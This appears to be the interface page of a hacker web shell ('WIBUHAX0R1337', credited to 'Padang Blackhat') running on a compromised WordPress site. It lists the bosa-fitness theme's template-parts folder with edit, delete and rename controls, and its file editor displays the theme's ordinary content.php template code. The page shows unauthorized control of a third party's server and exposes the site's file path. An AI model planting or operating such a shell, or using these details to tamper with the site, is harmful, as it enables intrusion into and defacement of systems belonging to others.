-
WIBUHAX0R1337
-
/
home
/
coludnqa
/
public_html
/
wp-content
/
themes
/
bosa-fitness
/
template-parts
/
[ Home ]
Create Folder
Create File
Nama File / Folder
Size
Action
.htaccess
0.231KB
Edit File
Delete File
Rename
content.php
6.473KB
Edit File
Delete File
Rename
site-branding.php
1.729KB
Edit File
Delete File
Rename
site-info.php
0.531KB
Edit File
Delete File
Rename
<?php /** * Template part for displaying posts * * @link https://developer.wordpress.org/themes/basics/template-hierarchy/ * * @package Bosa Fitness 1.0.0 */ ?> <?php $stickyClass = "col-12"; $layout_class = ''; if( get_theme_mod( 'sidebar_settings', 'right' ) == 'right' ) { if ( get_theme_mod( 'archive_post_layout', 'single' ) == 'grid' ){ $stickyClass = "col-sm-6 grid-post"; if( !is_active_sidebar( 'right-sidebar') ){ $stickyClass = "col-sm-6 col-lg-4 grid-post"; } } }elseif( get_theme_mod( 'sidebar_settings', 'right' ) == 'left' ) { if ( get_theme_mod( 'archive_post_layout', 'single' ) == 'grid' ){ $stickyClass = "col-sm-6 grid-post"; if( !is_active_sidebar( 'left-sidebar') ){ $stickyClass = "col-sm-6 col-lg-4 grid-post"; } } }elseif( get_theme_mod( 'sidebar_settings', 'right' ) == 'no-sidebar' ) { if ( get_theme_mod( 'archive_post_layout', 'single' ) == 'grid' ){ $stickyClass = "col-sm-6 col-lg-4 grid-post"; } }elseif( get_theme_mod( 'sidebar_settings', 'right' ) == 'right-left' ) { if ( get_theme_mod( 'archive_post_layout', 'single' ) == 'grid' ){ $stickyClass = "col-sm-6 col-lg-6 grid-post"; if( !is_active_sidebar( 'left-sidebar') && !is_active_sidebar( 'right-sidebar') ){ $stickyClass = "col-sm-6 col-lg-4 grid-post"; } } } if( get_theme_mod( 'disable_sidebar_blog_page', false ) && get_theme_mod( 'archive_post_layout', 'single' ) == 'grid' ){ $stickyClass = "col-sm-6 col-lg-4 grid-post"; } if( !is_sticky() && get_theme_mod( 'archive_post_layout', 'single' ) == 'list' ){ $layout_class = 'list-post'; }elseif( !is_sticky() && get_theme_mod( 'archive_post_layout', 'single' ) == 'single' ){ $layout_class = 'single-post'; }elseif( is_archive() && is_sticky() && get_theme_mod( 'archive_post_layout', 'single' ) == 'list' ){ $layout_class = 'list-post'; }elseif( is_archive() && is_sticky() && get_theme_mod( 'archive_post_layout', 'single' ) == 'single' ){ $layout_class = 'single-post'; } $class = ''; if(!has_post_thumbnail()){ $class = 'no-thumbnail'; } ?> <div class="<?php echo esc_attr( $stickyClass );?>"> <article id="post-<?php the_ID(); ?>" <?php post_class( $class . ' ' . $layout_class ) ?> > <?php if ( has_post_thumbnail() ) : ?> <figure class="featured-image"> <a href="<?php the_permalink(); ?>"> <?php if( get_theme_mod( 'sidebar_settings', 'right' ) == 'right' ) { if ( get_theme_mod( 'archive_post_layout', 'single' ) == 'grid' || get_theme_mod( 'archive_post_layout', 'single' ) == 'list' ){ bosa_image_size( 'bosa-420-300' ); }elseif( get_theme_mod( 'archive_post_layout', 'single' ) == 'single' ){ bosa_image_size( 'bosa-1370-550' ); } }elseif( get_theme_mod( 'sidebar_settings', 'right' ) == 'left' ) { if ( get_theme_mod( 'archive_post_layout', 'single' ) == 'grid' || get_theme_mod( 'archive_post_layout', 'single' ) == 'list' ){ bosa_image_size( 'bosa-420-300' ); }elseif( get_theme_mod( 'archive_post_layout', 'single' ) == 'single' ){ bosa_image_size( 'bosa-1370-550' ); } }elseif( get_theme_mod( 'sidebar_settings', 'right' ) == 'no-sidebar' ) { if ( get_theme_mod( 'archive_post_layout', 'single' ) == 'grid' || get_theme_mod( 'archive_post_layout', 'single' ) == 'list' ){ bosa_image_size( 'bosa-420-300' ); }elseif( get_theme_mod( 'archive_post_layout', 'single' ) == 'single' ){ bosa_image_size( 'bosa-1370-550' ); } }elseif( get_theme_mod( 'sidebar_settings', 'right' ) == 'right-left' ) { if ( get_theme_mod( 'archive_post_layout', 'single' ) == 'grid' || get_theme_mod( 'archive_post_layout', 'single' ) == 'list' ){ bosa_image_size( 'bosa-420-300' ); }elseif( get_theme_mod( 'archive_post_layout', 'single' ) == 'single' ){ bosa_image_size( 'bosa-1370-550' ); } } ?> </a> </figure><!-- .recent-image --> <?php endif; ?> <div class="entry-content"> <header class="entry-header"> <?php if( !get_theme_mod( 'hide_category', false ) ){ bosa_entry_header(); } if( !get_theme_mod( 'hide_post_title', false ) ){ the_title( '<h3 class="entry-title"><a href="' . esc_url( get_permalink() ) . '" rel="bookmark">', '</a></h3>' ); } ?> </header><!-- .entry-header --> <div class="entry-meta"> <?php bosa_entry_footer(); ?> </div><!-- .entry-meta --> <?php if ( !get_theme_mod( 'hide_blog_page_excerpt', false ) || !get_theme_mod( 'hide_post_button', true ) ){ ?> <div class="entry-text"> <?php if ( !get_theme_mod( 'hide_blog_page_excerpt', false ) ){ $excerpt_length = get_theme_mod( 'post_excerpt_length', 15 ); bosa_excerpt( $excerpt_length , true ); } ?> <?php if( !get_theme_mod( 'hide_post_button', true ) ){ $post_btn_defaults = array( array( 'blog_btn_type' => 'button-text', 'blog_btn_bg_color' => '#EB5A3E', 'blog_btn_border_color' => '#1a1a1a', 'blog_btn_text_color' => '#1a1a1a', 'blog_btn_hover_color' => '#086abd', 'blog_btn_text' => '', 'blog_btn_radius' => 0, ), ); $post_button = get_theme_mod( 'blog_page_button_repeater', $post_btn_defaults ); if( !empty( $post_button ) && is_array( $post_button ) ){ ?> <div class="button-container"> <?php $count = 0.2; foreach( $post_button as $value ){ if( !empty( $value['blog_btn_text'] ) ){ ?> <a href="<?php the_permalink(); ?>" class="<?php echo esc_attr( $value['blog_btn_type'] ); ?>"> <?php echo esc_html( $value['blog_btn_text'] ); ?> </a> <?php $count = $count + 0.2; } } ?> </div> <?php } } ?> </div> <?php } ?> </div><!-- .entry-content --> </article><!-- #post--> </div>
Save!!!
© 2022 - 2023 WIBUHAXOR V1 By Lutfifakee || Padang Blackhat